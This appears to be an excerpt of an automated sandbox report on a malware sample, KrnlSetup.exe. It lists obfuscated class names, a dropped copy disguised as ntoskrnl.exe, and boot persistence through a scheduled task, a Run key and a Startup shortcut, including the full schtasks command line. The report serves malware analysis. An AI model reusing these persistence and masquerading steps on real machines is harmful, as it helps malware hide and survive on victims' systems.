Source: C:\ProgramData\ntoskrnl.exe Code function: 16_2_00007FFD9B7600BD pushad ; iretd 16_2_00007FFD9B7600C1
Source: C:\ProgramData\ntoskrnl.exe Code function: 17_2_00007FFD9B7800BD pushad ; iretd 17_2_00007FFD9B7800C1
Source: KrnlSetup.exe, tASLOpZvl7GGRJYWR4yIssW5kl.cs High entropy of concatenated method names: '_7ssMBjEKbahFh3EoLQhI7V3fxT', 'IrPPxYwUhykeHZLyQHxJvo4mk0', 'hXgmLcmUofQeGwBxl47jkEk7BJ', '_9VF7gkkkTnq68qDA6LFTfJXoMN1WdDcGh205zycGb1LFckg9elhljtalKdfPYBqviFtXSgPWCC6cC7', 'IYZZN37JjyxjpV4hFnvoUKnJBIyEkMbVxOb1kxCTB0owlsyHMVnABlvx7CeAQKyTE9ej93emQ3l0YW', 'uiOIRcaMOND9Q1dqvNWA8B25lCIht1T4SteHBcmeFBaBdEggFFz5dK2JwGTUPXmMn0FtEbQbJpOqT1', 'paGaBerULx3vQuVa8ni2PhN6mO4xhNmS4mwEKBupiWdEFyW3jrLuQsynSnMwk63mENIhw3XoBwElbJ', 'JmGf0iehP7BRsB5GmcZL9NMlIrG0Drpyh1rmCm9ofeyUk10SNojjBdlerbL3yq7AZOaXSDfXsKp0aE', 'HkxSSRe4zmsdVH6SeuietRGiWooRix4icowlAyr3MpZYlHcaXUnQJrJyryzfgay8tQEAVnrW0cbBGq', 'E13gGu54ryvNILSdZ09LhjcTUPvW0hZzAVK17F8XMNTH3YGPpipRvXyOUn40cSjm5y4PgUB3RGuZj5'
Source: KrnlSetup.exe, nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.cs High entropy of concatenated method names: 'sikTj4Sabcae10kVCtmOsj21C8R3ET0y4hXzMlGUdjU', 'F51TEnYgWJkMTWdtDT9rvhyduzKP0VIU2IBoaWnDXhL', 'Zg6HONjk3u3JP3RRn0QDL1gDrtCkhRDYeuvroY9jpjv', 'Hg1lEVv05lei546bFSAA7AR1dV1aNfYpuZtMSf8aHt2'
Source: KrnlSetup.exe, cYX3OVhpLcA6pdQrK6x1pst8eZqf4OHXsSZvSKZX5QjcDyvssaTBTBt6QsMiumjxTz1UegqCK2fu4L22QvQnJFxcwLF.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ZGODKwtqkVbl63Si4J0b2IaskUEMLkfXUV1iqqMMxP1', '_96N0MdkYcRl39KtkJ0RIZmhL5BF7iZPKwPhtiY5yvz1', 'HcFxIT6VBJ0H2ApcxRgUD7DLuDNF1LQp8Txz1cJ0R6R', 'NwNozcGMHIOB8u8pTRepwD56kki98CuKR71BTWAXLIk'
Source: KrnlSetup.exe, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.cs High entropy of concatenated method names: 'pSD1lTqKZN7Sl6F073o5tcR2PxeiIFvKDhf3anKtyOAOmhTtSU6rBDZYJMNT5u0hVZ', 'veIZW0otddqoNKMbpvtqYGXIxXSSfF2hoTf9RbKFoAjHoM5OMtMWA1xNssME7o23Pi', 'gRbeiKLTfmcejQa1OqWejXIQUXvEnYRL46vrE3Wl3rljyuGEWuY3tLymgOUYNga9OD', 'Issh3FdMrPAdzw6kcdXr9tiwq3C5FPnsy5JvMlQ2oLQHCD1IHkqTLwsKFEJqL1TnOs', 'p2RhKecevXMbvidAAjsCf30k2rMzxwYB6tsxuf2eY4WWV9oXTeHbHEkNQQzhNRKO9p', 'FM1yLqYdQXX2BoXnIHpdzmJELCtu2Jay7ertowYpif535YkTaa31rlQhn8iaYTWLTW', '_5XPWgRAWsQZ36DdryyJuoq2LFS7S8SHUtFVUVaTX25fBj0QRfmAZabD3IS3DWvDpEx', 'mTjgvlSX2fRy8UMAAhPWUKg8HbaRUFx7WeaJdNC6sJrO6mNo4px7LY8L04IiIEelms', '_9dpsXVdx9VWhNQ1wYPFXwXyfXhxgjtn6S1DFo4B9phXPumFhvcrgc1RENXk5m116t7', 'adPkIZkUvgKz0ds1tzEtJea9zaVNbvPPUOI1fYAHquC4K2zlKZEgM5l3xd97w1ceLG'
Source: KrnlSetup.exe, plgxVns32E432OP91wDLjvcriYG7qgPnLar39J7oUOj4gvPqT27.cs High entropy of concatenated method names: '_5geOxBePcHi8fC3aDPbGoQ6JtzoLVCrhtafghF2u2uHEar2WFdE', 'VCSM48aD5KtdYb8bOBImpC2j67UwJ3L33joXl3uP7jgt0fBPEt24KtUTIEnXEv8uQu232OWH1MPpu1BbUta', 'Xdswxyqchr8KZ3sBmxHCbSAymEkKV5ov5FMM9nZAVownMzQHWuTb6dmzVCmR8hhfi274cl02yvfOaiTLy8T', 'LhIjSlMgRdBXIPsGX4MiqT9xh9YiwppQTd9PaXhfylx6DXrhq3nuvsCkIXnKss6SHtMaOh7yeacf2YhHgZL', '_5VRbpqAFTaQgm51y5QtkvW2Tm4fwJa6s8OlTN0XpGqCOtb2JfIzW7M4S794fopRJ1b0P4qgD4HFKl2AYXRQ', 'OD3xGY99UgG1dmE9G4PZeRSFLoWN3XX4X05VdkjxPNZtZVApgm4ZCU5Mvv178NR8BlYO4giVUqvZyp13TAO', 'pvYh3zjNVGQro5CnRnILLZbBXDddYhuK3kHq4QxJ70h4ZFDC0qWQ7LFpSSunFUVuGK4dOcX0kTyBLv0lopk', 'RZXwniU96hv3hM9UHDsgsLgipirp55Y2B5n9Gvni4lpki5WQSxstgqKdPRPnKfyt3AvfE6dmsu9pCM3chy5', 'g7rRJdbz0J6MnjLshSoaycTk6kXjmskFcq2JX1lQdSZ9TwNw9Tfz8zBanGTrZOgjT4gDPyhsiG84PCUy0Ak', 'SRm1sY9zI7wr8DtStICAoYyCJiCEVwXt8JtnSM8YSbS4aO4ZSvdB9fpMIPtL9eYOQzwnSOcnwnVtJHv00oj'
Source: KrnlSetup.exe, OKwK7LhbT17LhFoV8nXoqDfY9C.cs High entropy of concatenated method names: 'fZOkXT9QaQHEDxtpWtGtE5Zp0c', 'ODSElTfgUgNnpNWJYarXYD2LGCpS6k8k8tDwtnjVEgFSBGA88V9xAB3iRrnM4OyzgiLSBIya4tQjDo7MiJAv6Ob5s2GN4', 'BvCqdj21pcOuqP2KqeHnk9mnkQZazPaXzqBLtEsNRF7ckxBzV8ctV2zwWGobDLw10K47T266LDMOTtaBk1AVbqxniFBik', 'kTZC3zUk9yV2Lg94BFRKKkWVecaOlzcCA71elt9PtZ9DjS7qmpoimxP1BMwy56wpQddwmtgdmT7zmiNN04p26tdPpBigY', 'ZCYtJZr3a6i7mWNP8wU95OaeldFhQbSKoFcUeYCjUduxeruKjeYJIZGdBZz4yu4LnKxt6p2SRBjY8BrdECELJXLbhYHtB'
Source: KrnlSetup.exe, 68QERigio3OYDoczrnvFbx6mMZ.cs High entropy of concatenated method names: 'cw1Ye58i3sEWiVbc7pm0Ea6TMg', 'GbqXPEy94PYWQcuTw5tcq564CV', 'rLspw77oxv1WXq1PytR5dn7QHx', 'zaHEgI74aLxoj9n5UKM9E8vDZ3', 'nhzNzUjKDt3FkWychg4sePDkSxLPPUxChvFNhYTK0susVTuNWlwLhmwPQGoyj', 'ZFu5YMSYHc4IGdp2pdgdtfSWSIHMYQFippvBk8M1BcebkWB0CfMDxOT0kFTHJ', 'G8y8C1BCYxs7NfNc5IXA4o340lAfA2zsBpE4koXcEqxoI4vGcIhKaz77Y4YcP', 'w5PXLvTZa7GwEqkRyJ5T63IW6IMVxypAdgg0zmjttP7RvRAE8hKavpBoD2IDy', 'S76gv8uCSBTOueaICU6xRdIv1JcZVjT9tlMBT3lbPx2G6EE3K3StMW4XiVohN', 'NBWKErPt2cVkpKVJckBt7gD0eDiYGkPMUHWCGbcxDLVszKv6wQ9xx0uUN0A5R'
Source: KrnlSetup.exe, Wrga4JIQ161v6uXdIAXYuLFcsRxfHujcE.cs High entropy of concatenated method names: 'mzIauuQBhkC9t2jnlCZuTs22XJLUZbLm9', 'gKdsa7JiZ3xDKfLcvjFqHz1rG8SgxCkaa', 'xqOQZ2IF8DwRVIGCGGnw0ZVwE7vFC4VdPzmZ4NU2Yn2kacyDPp0BPqUf47AyobOH5a', '_2Fi7imDL4I9JOwMaJXO43BvOt8ONDW3yJIDP2Y8FUpoMEnUvQ97OJusun6QLpUkj1l', 'dhH6NTfipeUhM26Uu5piVb3kCPW7apHORRSBOXHfSHXS2USBlpXUDvvHAfSfHOSd6S', 'bJMAYNQLKlBduycg3sfNzdUT5pbsDcxMEeCgcDYuod9YZ0ARw3wtxDja2SzYNMeefL', 'xfOecYlHAAD1l0jYPDSG7Ej0zVGWClcyxVLKVSu0iemzghnLzqrlTr088dEZPPbM9C', 'zW9DSk7mQCz6uQtxIrBpIweMaJrgK7pZD3IjnQuSAzALZmfxcatpVUycGU2WdYzthV', '_2UJlUmzj3wBM5EzW7frus5d7Agz0BtCJhmOMkhGKWIqkIbSPlsOcJmqTr22RpMyGI2', 'jO5DYzjOX2qOtl50autwA0LbD8sMeqQbSe2FsApjcowDmahBPpUmAJgnjihTJt5ZzX'
Source: KrnlSetup.exe, LVwmQO4ax5JB4YFwVVHn5TmiZFyNcjVYW0Nn6PzcPuLC6TmagDM.cs High entropy of concatenated method names: 'cupxcXiwCuW6tLuxq8WwSNNLIqMRP8rlGwPNdf5vdAT1llg4sCl', 'On7be7edBqgbpw6N9bHwPdt21xUwbUTreGWLAoCaosbs8uEBtO9', 'bL60cWrHdLNg6I2I2Rz24YWL66CBUGrpUvfVdnIC6TEZu3A5dUf', 'TOELTNpx29aY8smfulV6lI5BrOZK', '_9h6z2STmyr7oL17GmG13d7NakwSf', '_2c8IdUkgIMK5Wrkgbxp1McxANSJJ', 'nb3SoW2ayJjaF15EJEBS8bqB83b9rePv1a0RNejrK3khxIsUAxt7hTEX83tMM', 'CzjfK39LMMval6SShzajFiA7oROasO1R5yXpY7LDDOzXB4SvzP1jVWBvtDuOz', 'wrHbHPnx4r0zjoYis8DL9o09NLuVYvcxRLSy9qDwWOeSIPqnBLikrk5ac9o8d', 'mZnzDDWxhtU5TLvIhrm2sKbXhhRvI2zPn7kiqb4HO3O5w20eqalujaEH60uyB'
Source: KrnlSetup.exe, FRsOn8xOk3xCVaucFsv91X3lefmoZdYvqD2xretC1VQ8E9yENMe.cs High entropy of concatenated method names: 'xk7cdZedBDWBNQZFjkeYPuOfswvNWwKnaFyJEonKvxY1XZ7OnAl', 'IvIHTMylshoeX2w4QRIhyvmYu8os', 'ltIKBIggk1XTA3ijsjErkHA5EGRY', '_4KrPj7q2XCofasrLwFUvb2vgyoBQ', 'ol7IHUZAmIlurJKjy9e1MPwupAx0'
Source: KrnlSetup.exe, ZErofTOG7QyG2YqbzUeXCBXVgf.cs High entropy of concatenated method names: 'uqKcLujo4ElgykH6ucSurssHoQ', 'Ovpbp5SkP6IKQ6E84Cm7rNmZij', 'fPl9sBA37MajH1ICUw3Ruok72s', 'SqaN5V8tXYmbgHpJ3wM5qEBDxB', '_4kVsLRnHFqrPhizEZ0HAgrobQl', 'gp6JKIii99RWPnt4TkKrMv5Tyw', 'RC2hydMiTzBiRbxRytYxATgJaH', 'jWphB5eHWngplbKwXBiEAzEkuG', 'jsOllqZzRJTQBMFBNmyD7rvTFh', '_9YaVQWshVMjgacH70h0sx1MXyX'
                                    Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.csHigh entropy of concatenated method names: 'j76x5cLmB9LJrX9gnQ3nPctoiYMJzEb8WzToQH0ce1ybtfsupf5', 'Aeazd6GI8VHwcZLZirW6YjpAWBpfjdSdVZw8GtbqjBu90FpExbg', 'zHewPP1L1NqsTfXWiPld4GOToBF2WwWhTYUXIBVT6v7Dct5cV4s', 'nW4qlZyEmawgqXC4yKi7l6EeUekhzgP0WYb3eDx08cohx3isXpf', 'GRfd9kgsYdlhf1E9iGyU2FGFIc4oBcwCeaRapsVwu5su70lPuJv', 'NjqdUp2RuRjQrhOlahUOpHoIbRl5tzE1NYjAvoDCzurgfNbAbVY', 'Rx7zgxy6oA5wj1yjHmoDo3uwMiX0Ar1BmLd9QAB8I0njaLzUGtA', 'F9gA5Gopk65n2sUHkLQ0wAkK0oXU3tcTwVzjRMkTrjgnv040SGL', 'uekCHoqlgFjYRjdhwC4SqRj8LTcwldU7Ml5NEXwyLvWlY27izys', 'KYaKXX5APHkvkOXvN8LwOis5lhW01H2zhM5AfVlUjyd69ek8JJZ'
                                    Source: ntoskrnl.exe.0.dr, tASLOpZvl7GGRJYWR4yIssW5kl.csHigh entropy of concatenated method names: '_7ssMBjEKbahFh3EoLQhI7V3fxT', 'IrPPxYwUhykeHZLyQHxJvo4mk0', 'hXgmLcmUofQeGwBxl47jkEk7BJ', '_9VF7gkkkTnq68qDA6LFTfJXoMN1WdDcGh205zycGb1LFckg9elhljtalKdfPYBqviFtXSgPWCC6cC7', 'IYZZN37JjyxjpV4hFnvoUKnJBIyEkMbVxOb1kxCTB0owlsyHMVnABlvx7CeAQKyTE9ej93emQ3l0YW', 'uiOIRcaMOND9Q1dqvNWA8B25lCIht1T4SteHBcmeFBaBdEggFFz5dK2JwGTUPXmMn0FtEbQbJpOqT1', 'paGaBerULx3vQuVa8ni2PhN6mO4xhNmS4mwEKBupiWdEFyW3jrLuQsynSnMwk63mENIhw3XoBwElbJ', 'JmGf0iehP7BRsB5GmcZL9NMlIrG0Drpyh1rmCm9ofeyUk10SNojjBdlerbL3yq7AZOaXSDfXsKp0aE', 'HkxSSRe4zmsdVH6SeuietRGiWooRix4icowlAyr3MpZYlHcaXUnQJrJyryzfgay8tQEAVnrW0cbBGq', 'E13gGu54ryvNILSdZ09LhjcTUPvW0hZzAVK17F8XMNTH3YGPpipRvXyOUn40cSjm5y4PgUB3RGuZj5'
                                    Source: ntoskrnl.exe.0.dr, nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.csHigh entropy of concatenated method names: 'sikTj4Sabcae10kVCtmOsj21C8R3ET0y4hXzMlGUdjU', 'F51TEnYgWJkMTWdtDT9rvhyduzKP0VIU2IBoaWnDXhL', 'Zg6HONjk3u3JP3RRn0QDL1gDrtCkhRDYeuvroY9jpjv', 'Hg1lEVv05lei546bFSAA7AR1dV1aNfYpuZtMSf8aHt2'
                                    Source: ntoskrnl.exe.0.dr, cYX3OVhpLcA6pdQrK6x1pst8eZqf4OHXsSZvSKZX5QjcDyvssaTBTBt6QsMiumjxTz1UegqCK2fu4L22QvQnJFxcwLF.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ZGODKwtqkVbl63Si4J0b2IaskUEMLkfXUV1iqqMMxP1', '_96N0MdkYcRl39KtkJ0RIZmhL5BF7iZPKwPhtiY5yvz1', 'HcFxIT6VBJ0H2ApcxRgUD7DLuDNF1LQp8Txz1cJ0R6R', 'NwNozcGMHIOB8u8pTRepwD56kki98CuKR71BTWAXLIk'
                                    Source: ntoskrnl.exe.0.dr, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.csHigh entropy of concatenated method names: 'pSD1lTqKZN7Sl6F073o5tcR2PxeiIFvKDhf3anKtyOAOmhTtSU6rBDZYJMNT5u0hVZ', 'veIZW0otddqoNKMbpvtqYGXIxXSSfF2hoTf9RbKFoAjHoM5OMtMWA1xNssME7o23Pi', 'gRbeiKLTfmcejQa1OqWejXIQUXvEnYRL46vrE3Wl3rljyuGEWuY3tLymgOUYNga9OD', 'Issh3FdMrPAdzw6kcdXr9tiwq3C5FPnsy5JvMlQ2oLQHCD1IHkqTLwsKFEJqL1TnOs', 'p2RhKecevXMbvidAAjsCf30k2rMzxwYB6tsxuf2eY4WWV9oXTeHbHEkNQQzhNRKO9p', 'FM1yLqYdQXX2BoXnIHpdzmJELCtu2Jay7ertowYpif535YkTaa31rlQhn8iaYTWLTW', '_5XPWgRAWsQZ36DdryyJuoq2LFS7S8SHUtFVUVaTX25fBj0QRfmAZabD3IS3DWvDpEx', 'mTjgvlSX2fRy8UMAAhPWUKg8HbaRUFx7WeaJdNC6sJrO6mNo4px7LY8L04IiIEelms', '_9dpsXVdx9VWhNQ1wYPFXwXyfXhxgjtn6S1DFo4B9phXPumFhvcrgc1RENXk5m116t7', 'adPkIZkUvgKz0ds1tzEtJea9zaVNbvPPUOI1fYAHquC4K2zlKZEgM5l3xd97w1ceLG'
                                    Source: ntoskrnl.exe.0.dr, plgxVns32E432OP91wDLjvcriYG7qgPnLar39J7oUOj4gvPqT27.csHigh entropy of concatenated method names: '_5geOxBePcHi8fC3aDPbGoQ6JtzoLVCrhtafghF2u2uHEar2WFdE', 'VCSM48aD5KtdYb8bOBImpC2j67UwJ3L33joXl3uP7jgt0fBPEt24KtUTIEnXEv8uQu232OWH1MPpu1BbUta', 'Xdswxyqchr8KZ3sBmxHCbSAymEkKV5ov5FMM9nZAVownMzQHWuTb6dmzVCmR8hhfi274cl02yvfOaiTLy8T', 'LhIjSlMgRdBXIPsGX4MiqT9xh9YiwppQTd9PaXhfylx6DXrhq3nuvsCkIXnKss6SHtMaOh7yeacf2YhHgZL', '_5VRbpqAFTaQgm51y5QtkvW2Tm4fwJa6s8OlTN0XpGqCOtb2JfIzW7M4S794fopRJ1b0P4qgD4HFKl2AYXRQ', 'OD3xGY99UgG1dmE9G4PZeRSFLoWN3XX4X05VdkjxPNZtZVApgm4ZCU5Mvv178NR8BlYO4giVUqvZyp13TAO', 'pvYh3zjNVGQro5CnRnILLZbBXDddYhuK3kHq4QxJ70h4ZFDC0qWQ7LFpSSunFUVuGK4dOcX0kTyBLv0lopk', 'RZXwniU96hv3hM9UHDsgsLgipirp55Y2B5n9Gvni4lpki5WQSxstgqKdPRPnKfyt3AvfE6dmsu9pCM3chy5', 'g7rRJdbz0J6MnjLshSoaycTk6kXjmskFcq2JX1lQdSZ9TwNw9Tfz8zBanGTrZOgjT4gDPyhsiG84PCUy0Ak', 'SRm1sY9zI7wr8DtStICAoYyCJiCEVwXt8JtnSM8YSbS4aO4ZSvdB9fpMIPtL9eYOQzwnSOcnwnVtJHv00oj'
                                    Source: ntoskrnl.exe.0.dr, OKwK7LhbT17LhFoV8nXoqDfY9C.csHigh entropy of concatenated method names: 'fZOkXT9QaQHEDxtpWtGtE5Zp0c', 'ODSElTfgUgNnpNWJYarXYD2LGCpS6k8k8tDwtnjVEgFSBGA88V9xAB3iRrnM4OyzgiLSBIya4tQjDo7MiJAv6Ob5s2GN4', 'BvCqdj21pcOuqP2KqeHnk9mnkQZazPaXzqBLtEsNRF7ckxBzV8ctV2zwWGobDLw10K47T266LDMOTtaBk1AVbqxniFBik', 'kTZC3zUk9yV2Lg94BFRKKkWVecaOlzcCA71elt9PtZ9DjS7qmpoimxP1BMwy56wpQddwmtgdmT7zmiNN04p26tdPpBigY', 'ZCYtJZr3a6i7mWNP8wU95OaeldFhQbSKoFcUeYCjUduxeruKjeYJIZGdBZz4yu4LnKxt6p2SRBjY8BrdECELJXLbhYHtB'
                                    Source: ntoskrnl.exe.0.dr, 68QERigio3OYDoczrnvFbx6mMZ.csHigh entropy of concatenated method names: 'cw1Ye58i3sEWiVbc7pm0Ea6TMg', 'GbqXPEy94PYWQcuTw5tcq564CV', 'rLspw77oxv1WXq1PytR5dn7QHx', 'zaHEgI74aLxoj9n5UKM9E8vDZ3', 'nhzNzUjKDt3FkWychg4sePDkSxLPPUxChvFNhYTK0susVTuNWlwLhmwPQGoyj', 'ZFu5YMSYHc4IGdp2pdgdtfSWSIHMYQFippvBk8M1BcebkWB0CfMDxOT0kFTHJ', 'G8y8C1BCYxs7NfNc5IXA4o340lAfA2zsBpE4koXcEqxoI4vGcIhKaz77Y4YcP', 'w5PXLvTZa7GwEqkRyJ5T63IW6IMVxypAdgg0zmjttP7RvRAE8hKavpBoD2IDy', 'S76gv8uCSBTOueaICU6xRdIv1JcZVjT9tlMBT3lbPx2G6EE3K3StMW4XiVohN', 'NBWKErPt2cVkpKVJckBt7gD0eDiYGkPMUHWCGbcxDLVszKv6wQ9xx0uUN0A5R'
                                    Source: ntoskrnl.exe.0.dr, Wrga4JIQ161v6uXdIAXYuLFcsRxfHujcE.csHigh entropy of concatenated method names: 'mzIauuQBhkC9t2jnlCZuTs22XJLUZbLm9', 'gKdsa7JiZ3xDKfLcvjFqHz1rG8SgxCkaa', 'xqOQZ2IF8DwRVIGCGGnw0ZVwE7vFC4VdPzmZ4NU2Yn2kacyDPp0BPqUf47AyobOH5a', '_2Fi7imDL4I9JOwMaJXO43BvOt8ONDW3yJIDP2Y8FUpoMEnUvQ97OJusun6QLpUkj1l', 'dhH6NTfipeUhM26Uu5piVb3kCPW7apHORRSBOXHfSHXS2USBlpXUDvvHAfSfHOSd6S', 'bJMAYNQLKlBduycg3sfNzdUT5pbsDcxMEeCgcDYuod9YZ0ARw3wtxDja2SzYNMeefL', 'xfOecYlHAAD1l0jYPDSG7Ej0zVGWClcyxVLKVSu0iemzghnLzqrlTr088dEZPPbM9C', 'zW9DSk7mQCz6uQtxIrBpIweMaJrgK7pZD3IjnQuSAzALZmfxcatpVUycGU2WdYzthV', '_2UJlUmzj3wBM5EzW7frus5d7Agz0BtCJhmOMkhGKWIqkIbSPlsOcJmqTr22RpMyGI2', 'jO5DYzjOX2qOtl50autwA0LbD8sMeqQbSe2FsApjcowDmahBPpUmAJgnjihTJt5ZzX'
                                    Source: ntoskrnl.exe.0.dr, LVwmQO4ax5JB4YFwVVHn5TmiZFyNcjVYW0Nn6PzcPuLC6TmagDM.csHigh entropy of concatenated method names: 'cupxcXiwCuW6tLuxq8WwSNNLIqMRP8rlGwPNdf5vdAT1llg4sCl', 'On7be7edBqgbpw6N9bHwPdt21xUwbUTreGWLAoCaosbs8uEBtO9', 'bL60cWrHdLNg6I2I2Rz24YWL66CBUGrpUvfVdnIC6TEZu3A5dUf', 'TOELTNpx29aY8smfulV6lI5BrOZK', '_9h6z2STmyr7oL17GmG13d7NakwSf', '_2c8IdUkgIMK5Wrkgbxp1McxANSJJ', 'nb3SoW2ayJjaF15EJEBS8bqB83b9rePv1a0RNejrK3khxIsUAxt7hTEX83tMM', 'CzjfK39LMMval6SShzajFiA7oROasO1R5yXpY7LDDOzXB4SvzP1jVWBvtDuOz', 'wrHbHPnx4r0zjoYis8DL9o09NLuVYvcxRLSy9qDwWOeSIPqnBLikrk5ac9o8d', 'mZnzDDWxhtU5TLvIhrm2sKbXhhRvI2zPn7kiqb4HO3O5w20eqalujaEH60uyB'
                                    Source: ntoskrnl.exe.0.dr, FRsOn8xOk3xCVaucFsv91X3lefmoZdYvqD2xretC1VQ8E9yENMe.csHigh entropy of concatenated method names: 'xk7cdZedBDWBNQZFjkeYPuOfswvNWwKnaFyJEonKvxY1XZ7OnAl', 'IvIHTMylshoeX2w4QRIhyvmYu8os', 'ltIKBIggk1XTA3ijsjErkHA5EGRY', '_4KrPj7q2XCofasrLwFUvb2vgyoBQ', 'ol7IHUZAmIlurJKjy9e1MPwupAx0'
                                    Source: ntoskrnl.exe.0.dr, ZErofTOG7QyG2YqbzUeXCBXVgf.csHigh entropy of concatenated method names: 'uqKcLujo4ElgykH6ucSurssHoQ', 'Ovpbp5SkP6IKQ6E84Cm7rNmZij', 'fPl9sBA37MajH1ICUw3Ruok72s', 'SqaN5V8tXYmbgHpJ3wM5qEBDxB', '_4kVsLRnHFqrPhizEZ0HAgrobQl', 'gp6JKIii99RWPnt4TkKrMv5Tyw', 'RC2hydMiTzBiRbxRytYxATgJaH', 'jWphB5eHWngplbKwXBiEAzEkuG', 'jsOllqZzRJTQBMFBNmyD7rvTFh', '_9YaVQWshVMjgacH70h0sx1MXyX'
                                    Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.csHigh entropy of concatenated method names: 'j76x5cLmB9LJrX9gnQ3nPctoiYMJzEb8WzToQH0ce1ybtfsupf5', 'Aeazd6GI8VHwcZLZirW6YjpAWBpfjdSdVZw8GtbqjBu90FpExbg', 'zHewPP1L1NqsTfXWiPld4GOToBF2WwWhTYUXIBVT6v7Dct5cV4s', 'nW4qlZyEmawgqXC4yKi7l6EeUekhzgP0WYb3eDx08cohx3isXpf', 'GRfd9kgsYdlhf1E9iGyU2FGFIc4oBcwCeaRapsVwu5su70lPuJv', 'NjqdUp2RuRjQrhOlahUOpHoIbRl5tzE1NYjAvoDCzurgfNbAbVY', 'Rx7zgxy6oA5wj1yjHmoDo3uwMiX0Ar1BmLd9QAB8I0njaLzUGtA', 'F9gA5Gopk65n2sUHkLQ0wAkK0oXU3tcTwVzjRMkTrjgnv040SGL', 'uekCHoqlgFjYRjdhwC4SqRj8LTcwldU7Ml5NEXwyLvWlY27izys', 'KYaKXX5APHkvkOXvN8LwOis5lhW01H2zhM5AfVlUjyd69ek8JJZ'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe File created: C:\ProgramData\ntoskrnl.exe
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KrnlSetup.exe.log

                                    Boot Survival

                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnk
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ntoskrnl

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\EF8C18E803B11A27265E 9BCF8DFC92BC643B9414A446DA4632050DE1B7577FEDF4F7711D3B4B3D46E06D
                                    Source: C:\Users\user\Desktop\KrnlSetup.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
